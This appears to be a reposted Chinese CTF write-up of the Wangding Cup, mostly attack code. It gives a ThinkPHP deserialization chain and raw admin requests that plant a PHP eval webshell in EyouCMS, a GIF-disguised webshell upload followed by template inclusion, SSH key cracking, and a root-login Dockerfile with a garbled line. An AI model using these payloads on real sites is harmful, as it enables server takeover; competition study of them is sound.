web01
方式1:反序列化
参考:
google:https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/
FreeBUF:https://www.freebuf.com/vuls/405365.html
根据这篇文章构造请求
反序列化链:
namespace thinkcachedriver;
class File
{
public $tag='t';
public $options = [
'path' => 'php://filter/string.rot13/resource=<?cuc @riny($_TRG[_]);?>/../a.php'
];
}
namespace thinksessiondriver;
use thinkcachedriverFile;
class Memcached
{
public $handler;
function __construct()
{
$this->handler=new File();
}
}
namespace thinkconsole;
use thinksessiondriverMemcached;
class Output
{
public $styles = ['removeWhereField'];
function __construct()
{
$this->handle=new Memcached();
}
}
namespace thinkmodelrelation;
use thinkconsoleOutput;
class HasOne
{
function __construct()
{
$this->query=new Output();
}
}
namespace thinkmodel;
use thinkmodelrelationHasOne;
class Pivot
{
public $append = ['getError'];
public function __construct()
{
$this->error=new HasOne();
}
}
namespace thinkprocesspipes;
use thinkmodelPivot;
class Windows
{
public function __construct()
{
$this->files=[new Pivot()];
}
}
$x=new Windows();
echo strlen(serialize($x));
echo base64_encode(serialize($x));
1、先增加一个栏目,默认id为541,不行的话可以爆破
POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 94
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
title=web01test&name=web01test&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99
2、编辑这个栏目,写入序列化内容
POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 1001
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
title=web01test&name=web01test&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=548&old_name=web01test&dtype[]=region
写入成功
3、访问触发反序列化
4、这里我本地搭建环境没复现成功,应该php版本或者think的问题,比赛环境是直接成功的。
方式2:文件上传+文件包含
1、上传
POST /login.php?m=admin&c=Ueditor&a=imageUp&savepath=allimg&pictitle=banner&dir=images&is_water=1&lang=cn&unneed_syn= HTTP/1.1
Host: 192.168.10.35
Content-Length: 432
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjnlAMRs0RqFuCxyM
Origin: http://192.168.10.35
Referer: http://192.168.10.35/login.php?m=admin&c=Uploadimgnew&a=get_upload_list&info=eyJudW0iOjEsInNpemUiOjIwOTcxNTIsImlucHV0IjoiIiwiZnVuYyI6IndlY2hhdF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoxfQ%3D%3D&lang=cn&unneed_syn=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: espcms_web_user_info=Ka46smL5rcg9exEplxVYBVPRwmhEQA6WeYFCIvIMSsqPsuPuTTNb3W1%2FjaBzTU8ez8gp%2B8pggV96%2FZZtDyCp2uJtQy8NyMSIat%2BvE15CWXvwKG3n5VqW2skWCXQ6epGhfQsVExJeu5afV6hcPyVcTp335WzaCu4L6q3YSjw9sR8ss3Vrctetiruty%2FS2UUD9NzKAaXwbsQ7Sndg3zsSi1RfTrIS7Txat%2B6jfxE%2FR36YAGMyepHPgXUX3CjAw4h7mBNtve5A2ZgpXZvG%2BJIBZVsfK2%2FQeVbCv7NCTHnRKapvzrqpvJk%2F8GWLVJUy%2F%2F74T5zcsZ5k05IjJy%2BszM77h4TOAg6rWLOaIZphyxq8I%2B88iwSHEFYRkWXB%2B9iXLDCVuATDNEcS0iMCecO9yhvRLpQEGrZuwV5fuHlhqg3IUjSV6DdNsBmWlxFfs%2BKWUAugin%2BrJ3AegVzg3jRgqIQwuXg5LwcfuUaPtPpqYdvMfJSJkrn2qTXqE0A9H7xv47mPWqcc9QBuJdiaSVt3ijy%2FcS0Hodi7p6gQ4AIYvxVYczR%2B%2FSrTxflt5EPng0QICB8keDjUPoLZ0bBT2YXXNzafYm%2Bn7b1NT2mtsdqNbDwffTjAKprS8iU1jKiyHtkg0PtGkE2HopemShQWMUjyjjlFoUsy5THdslhBwJNEwYYuQpPc2dH1VQYVPvezGze%2FEw%2B6frJ7ieHN6k2izdIJBK5lFsdAnJySSQgDlciYU632iSBxlUhOeErpPgxdh9ON7HctN%2FHWc7bXuKLtukHXubGDz0qiyo8sZ%2Fd7kPa%2FhOwCmI4MtIpnewKEEIzLn5wyMGFdj; espcms_web_server_info=cnlbzvT9pkB%2F%2Fa3QXzislq9%2B4%2BgVEB33q9hnv74tDZXmh5ZVm50VInsr%2BTFqqZIwS9KGlhqQlhlmBozbvdy7rRXUEE72xLLajnYi0wLIYmA%3D; PHPSESSID=e7jp10jq6tvdrspdg2uhfmaugh; admin_lang=cn; home_lang=cn; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; imgname_id_upload=erweima.png; workspaceParam=web%7CSystem; img_id_upload=
Connection: keep-alive
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="_ajax"
1
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="file"; filename="erweima.gif"
Content-Type: image/png
GIF89a<?php @eval($_POST['hack']);phpinfo();system("dir");?>
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="type_id"
0
------WebKitFormBoundaryjnlAMRs0RqFuCxyM--
2、文件包含
功能地图找到模板功能,将文件包含到index.html中
{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}
解题步骤(WriteUp)
第一步:环境如图
第二步:御剑扫描发现robots.txt
第三步:下载 wbStego4.bmp
第四步:改为公钥格式
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=
第五步:西二风ctf工具破解公钥
第六步:导出私钥链接SSH
本地搭建SSH公钥登录环境
FROM ubuntu:20.04
# 安装SSH服务器
RUN apt-get update &&
apt-get install -y openssh-server &&
mkdir /var/run/sshd &&
mkdir /root/.ssh
# 设置root密码(可选)
*111!!' | chpasswd :
# 允许root用户SSH登录
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
# 添加公钥
RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=" > /root/.ssh/authorized_keys
# 设置正确的权限
RUN chmod 700 /root/.ssh &&
chmod 600 /root/.ssh/authorized_keys
# 暴露SSH端口
EXPOSE 22
# 启动SSH服务
CMD ["/usr/sbin/sshd", "-D"]
docker build -t ssh-server .
docker run -d -p 2222:22 --name ssh-container ssh-server
Reverse2
解题步骤(WriteUp)
1、反编译直接读取class文件,在里面搜wdflag
2、抓内存
原文始发于微信公众号(瓜神学习网络安全):网鼎杯玄武组_部分WP
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论